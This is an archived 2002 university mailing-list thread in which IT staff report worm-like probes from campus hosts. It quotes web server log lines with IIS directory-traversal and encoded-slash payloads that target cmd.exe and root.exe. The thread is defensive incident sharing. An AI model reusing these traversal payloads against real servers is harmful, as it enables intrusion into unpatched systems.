LISTSERV 16.0 - MSUNAG Archives

Not to be a "me-too"er but I have noticed the same from the same IP
addresses on one of our windows boxes. ZoneAlarm showed approximately
400 alerts since 6pm Friday until 8am this morning.




Paul Donahue
Lead Computer/Network Technician
CVM Information Technology Center
A227 VMC, Michigan State University
Phone:  353-5551   Fax:  432-2937

>>> [log in to unmask] 01/21/02 08:51AM >>>
Probes from these hosts started coming in just before 11:00pm Saturday
night:

35.8.164.90 - bigone.hrt.msu.edu
35.8.33.189 - fpc04.nscl.msu.edu
35.8.34.114 - cycpc54.nscl.msu.edu
35.8.33.203 - talon.nscl.msu.edu
35.8.107.198 - No host name in DNS. Domain: llc,
  Language Learning Center in Old Hort


Probe examples:

35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/MSADC/root.exe?/c+dir
HTTP/1.0" 404 286
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
404 327
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
404 327
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/syste
m32/cmd.exe?/c+dir HTTP/1.0" 404 343
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310

--
Gene Willacker, Systems Analyst
MSU Division of Housing and Food Service
Food Stores Building
171 Service Road
East Lansing, MI 48824-1233
517-353-1691